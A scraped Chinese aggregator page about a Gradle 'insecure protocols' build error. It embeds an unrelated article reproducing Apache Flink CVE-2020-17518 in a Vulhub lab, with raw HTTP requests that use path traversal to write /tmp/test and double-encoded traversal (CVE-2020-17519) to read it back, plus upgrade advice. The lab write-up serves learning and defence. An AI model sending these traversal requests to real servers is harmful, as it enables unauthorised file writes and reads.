buildSrc:compileClasspath'. > Using insecure protocols with repositories, without explicit opt-in, is unsupported.

时间: 2023-09-28 12:08:05 浏览: 1016

Apache Flink CVE-2020-17518-id：L.pdf

### Apache Flink CVE-2020-17518 任意文件写入漏洞详解 #### 漏洞概述 CVE-2020-17518 是一个存在于 Apache Flink 中的安全漏洞，它允许远程攻击者通过 REST API 目录遍历来实现任意文件写入的功能。这一漏洞在 Flink 1.5.1 版本中首次引入，并一直存在至 1.11.2 版本。攻击者可以通过构造恶意的 HTTP 请求头，将文件写入到服务器的任意位置。 #### 漏洞细节 - **漏洞名称**：Apache Flink 任意文件写入漏洞 - **漏洞编号**：CVE-2020-17518 - **漏洞描述**：此漏洞利用了 Flink REST API 的设计缺陷，使得攻击者能够通过目录遍历的方式绕过权限控制，将任意文件写入到服务器上。 - **漏洞版本**：受影响版本范围为 1.5.1 至 1.11.2。 - **漏洞分析**：Flink 在 1.5.1 版本中新增了 REST API 功能，但未充分考虑到安全性问题，尤其是针对用户上传文件时的路径验证机制。攻击者可以通过精心构造的 HTTP 请求，利用目录遍历技巧，绕过安全检查并将文件保存到预期之外的位置。 #### 实验环境搭建与复现步骤为了更好地理解并复现此漏洞，我们可以按照以下步骤进行： 1. **实验环境准备**： - 使用 Vulhub 工具搭建实验环境。 - 首先下载 Vulhub，解压后进入目录 `vulhub-master/flink/CVE-2020-17518/`。 - 执行 `docker-compose build` 和 `docker-compose up -d` 命令来启动容器。 2. **复现步骤**： - 确保目标版本为 Flink 1.11.2。 - 发送恶意请求，构造如下 POST 请求： ``` POST /jars/upload HTTP/1.1 Host: 172.16.12.144:8081 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Length: 179 ------WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/test" test ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- ``` - 尽管返回的状态码为 400，且存在错误提示，但实际上文件已被成功写入到了服务器的指定位置。 3. **验证文件是否成功写入**： - 使用另一个漏洞（CVE-2020-17519）来验证文件是否被成功写入。此漏洞允许攻击者读取服务器上的任意文件。 - 构造 GET 请求： ``` GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252ftest HTTP/1.1 Host: 172.16.12.144:8081 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ``` - 如果请求成功，说明文件确实已经被写入到了服务器的 `/tmp/test` 路径下。 #### 安全建议 1. **升级版本**：强烈建议所有使用 Apache Flink 的组织和个人尽快升级到最新稳定版本，以修复已知的安全漏洞。 2. **限制访问**：对于需要暴露在公网的服务端点，应采用防火墙规则或访问控制列表等手段限制外部访问。 3. **代码审计**：定期进行代码审计和安全评估，确保系统的安全性。 4. **安全培训**：对开发人员进行安全培训，提高其安全意识，避免引入新的安全风险。 #### 结论 CVE-2020-17518 是一个严重威胁 Apache Flink 用户的安全漏洞。通过了解该漏洞的原理、复现过程以及采取相应的防护措施，可以有效地保护系统免受此类攻击。

这个错误通常是由于使用了不安全的仓库协议而导致的。在构建脚本的 `buildSrc` 模块中，可能有一个仓库使用了不安全的协议，例如 HTTP，而没有明确指定进行了不安全协议的选择。要解决这个问题，你可以采取以下步骤： 1. 确定是哪个仓库导致了该错误。检查 `build.gradle` 文件中的 `buildSrc` 模块，并查找其中的 `repositories` 部分。 2. 在 `repositories` 部分中，找到使用了不安全协议的仓库声明，通常是 `http://` 开头的 URL。 3. 将该仓库的协议更改为安全协议，例如 `https://`。 4. 如果更改仓库协议后仍然出现问题，可能需要查看仓库 URL 是否正确，并确保您的网络连接正常。通过执行上述步骤，您应该能够解决此错误并继续构建您的项目。

阅读全文

buildSrc:compileClasspath'. > Using insecure protocols with repositories, without explicit opt-in, is unsupported.

相关推荐

fortify规则库: 2019.4.0.0009 fortify规则库: 2020.1.0.0009

关于IDEA2020.1新建项目maven PKIX 报错问题解决方法

操作系统Windows10 gradle版本gradle7.4 错误信息Could not resolve all dependencies for configuration ':app:compileClasspath'. > Using insecure protocols with repositories, without explicit opt-in, is unsupported. Switch Maven repository 'Bstek

> Using insecure protocols with repositories, without explicit opt-in, is unsupported

idea 自带的gradle > Using insecure protocols with repositories, without explicit opt-in, is unsupported.

org.gradle.api.InvalidUserCodeException: Using insecure protocols with repositories, without explicit opt-in, is unsupported

Error:Using insecure protocols with repositories, without explicit opt-in, is unsupported.

如何解决Error:Using insecure protocols with repositories, without explicit opt-in, is unsupported.

Using insecure protocols with repositories, without explicit opt-in, is unsupported.

Using insecure protocols with repositories, without explicit opt-in, is unsupported

idea Using insecure protocols with repositories, without explicit opt-in, is unsupported.

gradle Using insecure protocols with repositories, without explicit opt-in, is unsupported.

tornado-6.4.1-cp38-abi3-musllinux_1_2_i686.whl

tornado-6.1-cp36-cp36m-manylinux2014_aarch64.whl

基于java的ssm停车位短租系统程序答辩PPT.pptx

tornado-6.4b1-cp38-abi3-musllinux_1_1_x86_64.whl

基于java的招生管理系统答辩PPT.pptx

课设毕设基于SpringBoot+Vue的医学电子技术线上翻转课堂系统源码可运行.zip

基于java的农机电招平台答辩PPT.pptx

最新推荐

tornado-6.4.1-cp38-abi3-musllinux_1_2_i686.whl

tornado-6.1-cp36-cp36m-manylinux2014_aarch64.whl

基于java的ssm停车位短租系统程序答辩PPT.pptx

tornado-6.4b1-cp38-abi3-musllinux_1_1_x86_64.whl

基于java的招生管理系统答辩PPT.pptx

Aspose资源包：转PDF无水印学习工具

管理建模和仿真的文件

【R语言高性能计算秘诀】：代码优化，提升分析效率的专家级方法

在构建视频会议系统时，如何通过H.323协议实现音视频流的高效传输，并确保通信的稳定性？

Go语言控制台输入输出操作教程